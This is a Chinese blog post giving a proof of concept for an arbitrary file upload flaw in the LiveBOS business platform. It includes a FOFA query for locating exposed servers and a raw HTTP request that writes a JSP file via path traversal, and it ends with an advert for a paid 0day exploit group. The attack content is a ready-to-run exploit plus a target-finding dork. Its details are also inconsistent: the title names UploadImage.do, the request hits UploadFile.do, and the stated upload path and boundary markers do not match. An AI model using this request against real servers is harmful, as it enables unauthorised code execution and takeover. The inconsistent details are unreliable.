LiveBOS-UploadImage.do-任意文件上传漏洞

已于 2024-08-01 20:04:51 修改
阅读量348 收藏 4
点赞数 4
分类专栏: 漏洞复现 文章标签: 网络安全
于 2024-08-01 19:30:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jingke666/article/details/140855251
版权

介绍:

LiveBOS灵动业务架构平台,是面向对象的业务支撑平台与建模工具。在LiveBos的UploadImage.do接口中,发现了一处任意文件上传漏洞,攻击者可利用该漏洞上传任意文件。

fofa:

body="Power by LiveBOS"

poc:

POST /feed/UploadFile.do;.js.jsp HTTP/1.1 
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxi
Connection: close
 
---WebKitFormBoundaryxegqoxxi
Content-Disposition:form-data; name="file"; filename="/../../../../rce.jsp"
Content-Type: image/jpeg
 
<%@ page import="java.io.File" %>
<%
 out.println("pppppppppoooooooocccccccccccc");
 String filePath = application.getRealPath(request.getServletPath());
 new File(filePath).delete();
%>
---WebKitFormBoundaryxegqoxxi--

连接地址:/1.jsp;.js.jsp

 内部福利介绍-更新啦,网络安全百分之八十的资源都可以在这找到!涵盖了POC库、账号共享、文档库、资源网获取、会员专属群,做你的网络安全资源大全!

近期更新的0day/1day(包含公开和未公开漏洞-仅列举部分)漏洞整理更新至9000+

图片

👇内容太多扫描二维码查看详细介绍👇

图片

棉花糖网络安全圈
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【1day】复现LiveBOS ShowImage.do 接口存在任意文件读取漏洞
记录并分享学习安全的知识点..
08-21 877
LiveBOS(简称LiveBOS)是顶点软件股份有限公司开发的一个对象型业务架构中间件及其集成开发工具。它以业务模型建立为中心,直接完成软件开发的创新软件开发模式。适合于各类基于WEB的专业应用软件与行业大型应用的开发。LiveBOS ShowImage.do 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感文件。 ​
LiveBOS UploadFile.do 任意文件上传漏洞复现(XVE-2023-21708)
0xSec
08-01 627
LiveBOS UploadFile.do 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
POC分享 LiveBOS UploadFile.do 任意文件上传漏洞复现(XVE-2023-21708)
最新发布
qq_56895879的博客
08-06 149
【代码】POC分享 LiveBOS UploadFile.do 任意文件上传漏洞复现(XVE-2023-21708)
1day未公开LiveBOS feed 接口任意文件上传漏洞复现
weixin_43167326的博客
08-01 641
LiveBOSLive Business Object System)是顶点软件自主研发的以业务对象建模为核心的业务中间件及其集成开发工具,它通过业务模型建立直接完成软件开发的创新模式,支持各类基于WEB的专业应用软件与行业大型应用的开发。LiveBOS系统由三个相对独立的产品构成:运行支持支撑平台LiveBOS Server、开发集成环境LiveBOS Studio以及运维管理工具LiveBOS Manager。
任意文件上传漏洞原理及上传利用案例(任意文件上传漏洞怎么解决)
白帽黑客八哥的博客
12-18 1696
任意文件上传漏洞是一种Web应用程序中常见的安全漏洞,攻击者通过该漏洞可以上传恶意文件到服务器上。这可能导致多种安全问题,包括远程代码执行、服务器拒绝服务等。通常,攻击者通过构造特定的文件上传请求,绕过应用程序的文件类型验证和访问控制,成功上传具有恶意代码的文件。
任意文件上传漏洞详解与防护
鑫和皓的博客
08-10 1858
任意文件上传漏洞是一种常见的网络安全问题,它允许攻击者上传并执行恶意文件,从而获取或破坏系统数据。上传恶意脚本:攻击者可以上传包含恶意代码的脚本文件,如PHP、ASP、JSP等,然后通过浏览器访问这些文件,执行恶意代码。上传恶意二进制文件:攻击者可以上传包含恶意代码的二进制文件,如DLL、EXE等,然后利用其他漏洞或手段执行这些文件。严格检查上传文件:对上传文件的类型、大小、名字和内容进行严格的检查,只接受符合要求的文件。使用安全编程技术:在编写文件上传功能时,使用安全编程技术,如预备语句、输入验证等。
LiveBos ShowImage.do文件imgName参数任意文件读取漏洞
weixin_43567873的博客
03-10 253
LiveBos ShowImage.do文件imgName参数任意文件读取漏洞
React Native Webview安全问题解决办法
lxyoucan的博客
03-19 3272
威胁描述 根据CVE披露的WebView远程代码执行漏洞信息(CVE-2012-663、CVE-2014-7224),Android系统中存在一共三个有远程代码执行漏洞的隐藏接口。分别是位于android/webkit/webview中的“searchBoxJavaBridge”接口、android/webkit/AccessibilityInjector.java中的“accessibility”接口和“accessibilityTraversal”接口。调用此三个接口的APP在开启辅助功能选项中第三方
vue-uploadImage.zip
03-31
在本文中,我们将深入探讨如何使用Vue.js框架实现移动端图片的压缩上传功能,特别是针对iOS设备,支持多图上传,并且提供图片的增删改查操作。Vue.js是一款轻量级、灵活且易于上手的前端JavaScript框架,适用于构建...
LiveBOS产品白皮书V1.3.0.pdf
10-16
LiveBOS产品白皮书V1.3.0.pdf
upload-v2.rar
07-02
可以在uploadimage.jsp里面修改你要上传的文件大小值,文件类型,和上传所需要的文件夹,要修改的话则需要去upload.jsp里面修改相应的超连接属性值。 jspsmartupload.jar上传组件必须放在tomcat\common\lib下面,...
Dapp-UploadImage
04-13
区块链Dapp上传图像/文档/视频它是用于区块链的基本Dapp,使用Solidity Smartcontract + Truffle + JS(使用HTML + CSS作为前端)创建IPFS,并用于对等上载图像哈希功能的IPFS 安装:安装IPFS: a. sudo apt-get ...
tinymce-uploadimage:TinyMCE 4插件以上传图像(base64)
05-08
UploadImage,一个TinyMCE插件 版本0.1-2017年1月 许可GNU GPL v2 作者弗朗索瓦·雅克(FrançoisJacquet) 该插件允许用户上传直接放置在文本区域中的图像。 从技术上讲,图像会自动转换为base64代码。 没有...
uploadImage.zip
05-28
在IT领域,图片上传预览功能是Web应用中常见的需求,尤其在社交媒体、电商网站以及各种用户交互平台中。这个"uploadImage.zip"文件提供了一个使用原生JavaScript和HTML实现的解决方案,它既简单又实用,并且兼容主流...
【渗透+取证】博客传送门(持续更新中)
记录并分享学习安全的知识点..
12-05 1736
【渗透+取证】博客传送门(持续更新中)
LiveGBS国标流媒体GB28181开放流媒体服务平台-实际测试时问题排查
热门推荐
青柿视频流媒体的博客
04-22 1万+
LiveCMS 和 LiveSMS都部署起来后,浏览器输入ip:10000端口打不开LiveCMS的页面。这种情况一般是LiveCMS的10000端口被其他程序占用了导致。可以先卸载LiveCMS,打开livecms.ini文件,把http端口从10000改成100002或其他端口,再重新安装LiveCMS。
liveBOS环境搭建
weixin_30295091的博客
06-21 514
环境搭建:1.准备jdk1.6及以上版本oracle11gplsqlsql脚本(oracle_init.sql,oracle_insert.sql)livebos_tomcatlivebos的授权文件 2.jdk的安装及环境变量的配置在命令行窗口中输入 java -version 查看自己安装的jdk版本本机装的是jdk 1.7.0_51,因为是jdk版本1.6以上,所以就不更换了 如果没有安...
livebos报表开发
阿浪的专栏
04-27 491
文章目录1.参数的设定2.展示的内容3.综合展示的效果4.调用过程5.可以在数据库里面查看6.注意事项7.过程代码 1.参数的设定 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-flb5C49A-1619516341977)(/uploads/xinxibuneibuzhishiku/images/m_bc71bb4608053778dbf29e06cd102ae1_r.png)] 2.展示的内容 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-
js 固定路径 D:\fb\易图助手1.16\20230809_160403_\11 all black 8-13\IMG_4668 20210629-134236.jpg 上传
08-12
要使用JavaScript上传固定路径的图片,你可以使用`FormData`对象和`XMLHttpRequest`来完成。以下是一个示例代码: ```html <input id="uploadinput" type="file" style="display:none;"> <button onclick="uploadImage()">上传图片</button> <script> function uploadImage() { var imageFilePath = "D:\\fb\\易图助手1.16\\20230809_160403_\\11 all black 8-13\\IMG_4668 20210629-134236.jpg"; var fileInput = document.getElementById("uploadinput"); var formData = new FormData(); formData.append("image", fileInput.files[0], imageFilePath); var xhr = new XMLHttpRequest(); xhr.open("POST", "upload.php", true); xhr.onreadystatechange = function() { if (xhr.readyState === 4 && xhr.status === 200) { console.log("图片上传成功!"); } }; xhr.send(formData); } </script> ``` 在上述示例中,我们首先定义了一个隐藏的文件选择输入框,以及一个按钮来触发上传操作。 在JavaScript代码中,我们定义了`uploadImage()`函数,该函数会在按钮点击时被调用。在函数内部,我们指定了要上传的图片的固定路径(`imageFilePath`)。 然后,我们获取文件选择输入框(`fileInput`)和创建一个`FormData`对象(`formData`)。我们将固定路径的图片添加到`formData`中,并将其命名为`image`。 接下来,我们创建一个`XMLHttpRequest`对象(`xhr`),并通过`open()`方法指定请求的方法、URL和异步标志。在`onreadystatechange`事件中,我们检查响应的状态和状态码,如果上传成功,则在控制台输出成功信息。 最后,我们通过`send()`方法发送包含图片的`formData`对象。 请注意,由于安全性限制,JavaScript无法直接访问用户的文件系统,因此你需要手动将图片路径指定为一个固定的路径。另外,你需要在服务器端(如`upload.php`)接收并处理上传的图片。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值